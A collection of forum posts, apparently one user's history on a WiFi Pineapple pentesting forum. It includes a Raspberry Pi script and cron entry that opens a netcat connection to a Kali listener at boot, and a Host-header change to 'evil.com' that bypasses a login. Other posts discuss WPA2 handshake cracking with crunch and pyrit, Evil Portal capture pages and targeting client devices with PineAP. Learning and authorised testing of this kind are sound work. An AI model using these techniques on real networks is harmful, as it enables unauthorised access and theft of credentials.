[Running netcat on Raspberry Pi boot]

On 6/21/2018 at 11:12 PM, i8igmac said:

i have experience this same thing. I believe netcat starts up before your networking services completely configured.

 

What worked for me.

 

Sleep 15

netcat . . . 192. 

Exit 0

@i8igmac-  you've cracked it!  Added the sleep command and it's working a treat now.  thank you for your assistance and suggestions, really appreciate it

[Running netcat on Raspberry Pi boot]

Thanks for the quick suggestion @i8igmac - appreciate it.

Unfortunately, that's not worked.  I've edited /etc/rc.local and added

netcat  192.168.1.215 443 -w 10

On reboot - nothing.  If I run the command stand alone, it connects fine, so I've ruled out a connectivity issue there.

Could it be anything to do with the user that the pi boots with?  I've tried adding sudo in front of the netcat command - nothing.

any suggestions from you guys is appreciated 

[Running netcat on Raspberry Pi boot]

I'm trying a proof of concept whereby when my Pi starts, it kicks off a Netcat session with my Kali laptop. 

Setup:

Kali laptop (192.168.1.215): netcat -lvp 443

Pi (192.168.1.217): 

I have the script boot_netcat.sh (and ran chmod +x on it):

!#/bin/bash

netcat 192.168.1.215 443 -w 10

In crontab I have added:

@reboot /home/pi/scripts/boot_netcat.sh

When I reboot the Pi, the script isn't run.  I've tried adding sudo to the script and also the crontab entry - still no joy.

I've also tried this by ensuring cron is run at boot via /etc/rc.local:

/etc/init.d/cron/start

And still nothing.  If I run ps aux |grep cron I can see cron running.  If I run the script on its own, it executes and connects to my Kali laptop netcat listener.

I'm sure it's something very simple that I'm not doing or not seeing - any suggestions as to what the problem is, or is there a better way to do this?

Thanks in advance

[changing header host to view content behind a login]

Thanks @digininja, appreciate the quick response. confirms one of my theories

[changing header host to view content behind a login]

I've got a page where the content access is restricted by a username/password combination.  It's not credentials where the user has to register for, it's just set on the server where all content is publicly accessible, apart from this page.  I've found that I can access this by changing the header host value (via burp)

Original:

GET /content HTTP/1.1

host: site.com

which returns HTTP 401 authorization required

I change the header details to:

GET /content HTTP/1.1

host: evil.com

then I can access the requested page. I kinda stumbled across this, and would like to learn more about it - any advice as to what this type of vulnerability is called, and why it happens?  I *think* that it's happening due to the validation only working when the request comes from the host domain, but would like confirmation of this.

 

Cheers

[Tools used to identify web application software and version]

Any tools you can recommend for looking at a website/application to deduce the software and versions that have been used?  I don't mean like an nmap scan to identify services, but the software and services that are used when you're browsing the site.  Thinking along the lines of builtwith.com, and something that goes a little deeper

thanks in advance

[OSINT/Passive: Typical order of tools used]

Thanks both for your feedback, very interesting and useful

[OSINT/Passive: Typical order of tools used]

When you're running the OSINT and passive part of your engagement, what's the typical order of tools that you tend to run through? 

Dig, Fierce, DNS Recon

Google hacks, Shodan, netcraft, built with

Harvester

Recon-ng, OSINT Framework

Nikto

Skipfish

HTTrack, Burpsuite

 

etc. etc.

How do you structure your part of a pen test?

[Reason: 15=4WAY_HANDSHAKE_TIMEOUT]

On 25 October 2016 at 2:21 AM, yonomas said:

Is there another reason?  The router and the nano are on the same table  

30cm is the distance.

You need to get even closer.

[The Wifi PineApple Book]

On 02/09/2016 at 8:01 AM, bored369 said:

In the latest episode (8/31/16 air date) the ducky was used for pretty much a whole segment of the show and in the spot light.  It was really well done but they did leave one portion to mess people up if someone tries to do exactly what they did in the episode with the ducky.

 

I've not watched this yet; what did they mess up?  was it intentional so that viewers have to find out for themselves, or was it an oversight?

[SQL injection: steps after identifying a vulnerabilty]

I'm learning my way through SQLi, and wondered what typically, the next steps are after I've:

1. Identified a vulnerability

2. via SQLi I've listed DB, user, tables, columns, content of columns etc

3. identified that user is not sysadmin (on a MySQL system)

Where does one typically go next with identifying further information, and ultimately escalating privileges? I'm not after a step by step hold my hand approach, more a general 'this is the order I tend to do things in', as I know everyone has a different approach.

thanks in advance

[Worth piping crunch to pyrit GPU]

Just curious, what kind of GPU/GPU's are you using?

Probably one of these: https://aws.amazon.com/ec2/instance-types/(Scroll down for GPU G2). TBH I've only just started looking into this, and I was fortunate enough to receive a $50 AWS voucher, so thought I'd have a play around with GPU pyrit.

Model GPUs vCPU Mem (GiB) SSD Storage (GB)

g2.2xlarge 1 8 15 1 x 60

g2.8xlarge 4 32 60 2 x 120

[Worth piping crunch to pyrit GPU]

Why save the output?

Crunch spits out the generated sequence to try, the result is yes or no and you know there's only going to be 1 yes which just happens to be the only one you're interested in.

So your need isn't storage space, it's processing power. Correct?

Sorry, I worded my question rather vaguely. I have not a lot at home in terms of processing power, so am thinking that AWS GPU solution might be the way to go.

thanks for your quick response

[Worth piping crunch to pyrit GPU]

Hi all.

I've got a WPA2 handshake to crack, I know the format is 8 upper case A-Z and 0-9. I was thinking of using an AWS GPU instance to pipe Crunch output into Pyrit GPU, as I don't have masses of storage space to save the output. Does this sound like a feasible option, or can you think of a better way?

Cheers

[Cybersecurity / Pentest demonstration with the NANO]

If you've got time to prepare whilst other presentations are on, why not run a recon as close to the clients as you can get, and try to identify their devices. Then you can log probes that their devices are making, and set up PineAP with some of their SSIDs, and omit any other probes - that way you keep it targeted to the client and show them that they can be singled out pretty easily. Might be worth finding out if there are any legal issues with this before you embark

[Landing Page / Evil Portal - Capture data]

The changes I make (via my Nano front end) to the landing page are saved into /etc/pineapple/landingpage.php

This is the page that I see when I connect to PineAP with my phone. the images and other php files that my landing page uses are called from /www/

so, it's all working, but is the landing page being stored in the correct location?

[Landing Page / Evil Portal - Capture data]

You can put all the files in /etc/www/ with an index.php as landing page.

I don't have /etc/www folder - I assume I create this myself, or should it be present by default?

[General NANO Discussion]

My thoughts: I believe while your devices (iOS and Mac systems) are already connected they will not probe. I also believe that it depends on the manufactures wifi supplicant. For example: your apple devices may be coded to probe less often than say your neighbors WiFi card.

sounds valid, thanks for feeding back

some further info; my devices are connected to my local Wi-Fi network, not the PineAP. I've looked at the mac address of some of the devices broadcasting from my neighbours, and if the results are to be believed, a device vendor search shows some of them as Apple devices too.

I'll play around more and report back

[General NANO Discussion]

Q: Just lately I've noticed that when running PineAP, my mobile devices (iOS, Mac OS) aren't probing much. When I check the logs, I see that my neighbours devices, and other devices where I'm scanning are making far more probes. I'd have expected the local/stronger signal devices to make the probes, especially as they've been more prevalent with their probing in the past.

any thoughts?

[[Official] LogManager]

Great module!

[problems after 1.0.5 firmware update]

long shot; have you cleared browser cache first?

[Hitting reset button on upgrade really necessary? And connector care.]

Is hitting the reset button on the back really necessary for upgrades?

Isn't it to disable wifi temporarily?

[What device are you using the NANO with?]

Asus Netbook with Kali 1.0

LG Leon 4G Android 5.1

Macbook Pro/iPad Air/iPhone 6 for SSH into Nano

[UK Pay as you go tethered burner phone]

Might be of use to those running an iOS device, and hence no tethering; I've picked up an LG Leon for £50 from EE. It's PAYG and EE allow tethering, some network operators block PAYG tethering.

Just tested the Pineapple app and tethering, all good.

I don't work for EE, just passing the info on. the phone itself is very unremarkable

Looking forward to playing around with the Nano on my commute now!

*edit: it's an Android device

[Extending NANO WiFi range - high gain antenna?]

Just got my NANO and I'm really enjoying tinkering... but the WiFi signal doesn't seem to be as strong as I had hoped. I'm not picking up as many AP's as it seems I should when driving.

Out of interest, what are your expectations? I'm (very) new to Pineapple, and went for a drive through my local high street the other day with the Nano sat on the front seat; I was really impressed by the 46 different SSID's and 21 Associations that were made in a 5 minute poodle through the town. Maybe I was lucky and managed to drive through a very SSID heavy area.